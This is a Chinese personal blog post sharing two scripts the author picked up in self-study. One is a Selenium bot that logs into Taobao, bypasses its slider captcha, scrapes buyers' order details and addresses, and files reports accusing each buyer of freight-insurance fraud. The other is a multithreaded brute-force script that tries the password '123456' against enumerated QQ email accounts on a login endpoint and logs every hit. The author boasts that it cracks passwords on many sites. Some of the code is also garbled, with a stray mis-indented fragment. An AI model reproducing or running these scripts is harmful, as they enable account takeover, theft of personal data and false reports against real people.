周六的自习偷偷学了啥

爬虫之类的东西:

import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from lxml import etree

print('请输入账号:')
username=input()
print('请输入密码:')
password=input()
driver=webdriver.Chrome(r'E:\python\chromedriver.exe')
driver.maximize_window()
driver.get('https://login.taobao.com/member/login.jhtml?redirectURL=http%3A%2F%2Ftrade.taobao.com%2Ftrade%2Fitemlist%2Flist_sold_items.htm%3Fspm%3Da313o.201708ban.category.d28.64f0197aAFB4S5%26mytmenu%3Dymbb'
)

js="""
  document.getElementById('TPL_username_1').value='{0}';
  document.getElementById('password-label').value='{1}';
  document.getElementById('J_SubmitStatic').click()
""".format(username,password)
driver.execute_script(js)
try:
    element=driver.find_elements_by_id('nc_1_scale_text')
    ActionChains(driver).drag_and_drop_by_offset(element,400,0).perform()
    time.sleep(2)
    driver.execute_script(js)
except:
    print('没有开挂')
    pass
time.sleep(3)
print('开始开挂')
driver.switch_to.frame(0)
try:
    driver.find_element_by_id('J_GetCode').click()
    print('请输入手机验证码')
    x=input()
    driver.find_element_by_id('J_Phone_Checkcode').send_keys(x)
    driver.find_element_by_id('submitBtn').click()
except Exception as e:
    print(e)
    driver.execute_script('window.stop()')

time.sleep(3)
driver.refresh()

try:
    WebDriverWait(driver,15).until(EC.presence_of_all_elements_located((By.ID,'page')))
except:
    print('over')
    driver.execute_script("window.stop()")
html=driver.page_source
selector=etree.HTML(html)
list1=selector.xpath('//div[contains(@class,"item-mod__trade-order")]')

try:
    for i in list1:
        order_id = i.xpath('table[1]/tbody/tr/td[1]/label/span[3]/text()')[0]  # 订单号
        order_time = i.xpath('table[1]/tbody/tr/td[1]/label/span[6]/text()')[0]  # 下单时间
        price = i.xpath('table[2]/tbody/tr/td[2]/div/p/span[2]/text()')[0]  # 价格
        all_price = i.xpath('table[2]/tbody/tr/td[7]/div/div[1]/p/strong/span[2]/text()')[0]  # 总价
        saler_title = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0]  # 商品名
        name = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0]  # 买家账户名
        url = i.xpath('table[2]/tbody/tr/td[6]/div/div/p[1]/a/@href')[0]  # 商品详情url
        url = 'https:' + url
        driver.get(url)
        time.sleep(3)
        driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/ul/li[2]/a').click()
        address=driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/div/div[2]/div/div/div[1]/div/span[2]/span').text
        print(order_id,order_time,price,all_price,saler_title,name,address)
        ### 进入guimi进行操作
        driver.get('http://guimi.taobao.com')
        time.sleep(3)
        driver.find_element_by_xpath('/html/body/div[3]/div/div/a[2]').click()
        driver.find_element_by_xpath('//*[@id="J_Portal"]/div/div[1]/div[2]/a[1]').click()
        time.sleep(3)
        driver.find_element_by_id('order.0').send_keys(order_id)
        driver.find_element_by_xpath(
            '//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div/button[4]').click()
        time.sleep(1)
        driver.find_element_by_xpath(
            '//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div[2]/button').click()
        time.sleep(1)
        target = driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[3]/div[3]/div/div[3]/textarea')
        driver.execute_script("arguments[0].scrollIntoView();", target)
        target.send_keys('骗运费险的')
        driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[4]/button').click()

except Exception as e:
    print('出错拉'+e)
finally:
    driver.quit()

利用selenium模块,通过模拟的chrome浏览器自动登陆淘宝并移动滑块

又由于想看老师的爬虫实战文章,被迫去网上寻找暴力破解密码的方式,找了很久终于找到了一家靠谱的——https://blog.csdn.net/dwx1005526886/article/details/80642072

import hashlib
import json
import random
import socket
import threading
import time
from threading import Lock

import requests

user_num_low = 111111111
user_num_max = 9999999999
user_nbr = user_num_low

mutex=Lock()

#构造用户邮箱
def get_user_nbr():
    mutex.acquire(3)
    global  user_nbr
    user_name = '%s%s' % (str(user_nbr), '@qq.com')
    user_nbr = user_nbr + 1
    mutex.release()
    return user_name

def user_end_judge():
    mutex.acquire(3)
    result = False
    if user_nbr > user_num_max :
        result = True
    else:
        result = False
    mutex.release()
    return  result

def get_curr_user():
    mutex.acquire(3)
    global  user_nbr
    user_name = '%s%s' % (str(user_nbr), '@qq.com')
    mutex.release()
    return user_name

#  

#  构造用于判断密码邮箱是否存在



user_agent = [
    'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30',
    'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)',
    'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'
]

def save_pwd(user, pwd,desc):
    with open("resut.txt","a+") as f:
        f.write('user:'+ user + '  pwd:' + pwd + " desc:" + desc + '\n')

def user_test(username,password):
    resp = ""
    result = ""
    url = "http://www.k*.htm"
    pwd = password
    user= username
    md = hashlib.md5()
    md.update(pwd)
    password =  md.hexdigest()
    data = {'email':username,'password':password}

    # 设置网页编码格式,解码获取到的中文字符
    encoding = "gb18030"
    # 构造http请求头,设置user-agent
    header = {
        "User-Agent": random.choice(user_agent),
        'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With':'XMLHttpRequest'
    }

    try:
        requests.adapters.DEFAULT_RETRIES = 5
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except requests.exceptions.ReadTimeout:
        print("1")
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except requests.exceptions.Timeout:
        print("2")
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except requests.exceptions.ConnectionError:
        print("3")
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except socket.error:
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except BaseException as e:
        print(e)
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)

    resp.keep_alive = False
    #print(resp.content)
    try:
        result = resp.content
        json = resp.json()
        print('邮箱:%s ,result:%s \n ' % (username,result))
        if (json['message'].find('不存在') > -1):
            #print('邮箱:%s 为空' % username )
            return False
        else:
            print('邮箱: %s 存在' % username)
            save_pwd(username, password, json['message'])
            return True
    except BaseException as e:
        print("发送错误 e: %s result:%s response code:%d" % (e, result, resp.status_code ))

 

# 好了,我们获取到邮箱之后,就是要判断密码是否正确了,由于大部分人网站登陆,还是使用弱密码,我们可以到网上找一下相关的字典库,就可以直接破解了。
# 
# 判断密码是否正确,我们只需要在判断邮箱存在之后,再加一个判断即可。

if(json['message'].find('错误') > -1):
                print("邮箱: %s 密码: %s ,密码错误!" % (username,pwd))
                return False
            else:
                print('邮箱: %s  密码: %s ,登陆成功!' % (username, pwd))
# 由于用户和密码验证较多,单一线程工作需要较长的时间,因此我们需要用上多线程,缩短密码破解时间。


def thread_bru(): # 破解子线程函数
    #while not user_end_judge():pwd_queue.empty()
    while not user_end_judge():
        try:
            pwd = '123456'
            user = get_user_nbr()
            #print pwd_test
            #if user_test(user, pwd_test):
            if user_test(user, pwd):
                result = pwd
                print ('破解 %s 成功,密码为: %s' % (user, pwd))
                break
        except BaseException as e:
            print("破解子线程错误: %s" % e)

def brute(threads, pwd_queue=None):
    for i in range(threads):
        t = threading.Thread(target=thread_bru)
        t.start()
        print('破解线程-->%s 启动' % t.ident)
    while (not user_end_judge()): # 剩余口令集判断
        print('\r 进度: 当前值 %d' % pwd_queue.qsize())
        time.sleep(2)
        #print('\n破解完毕')

if __name__ == "__main__":
    brute(150)

运行之后发现并不能破解博客园的密码,不过很多其他网站的密码就可以被破解

posted @ 2019-09-07 14:17  是我,米老鼠  阅读(152)  评论(0编辑  收藏  举报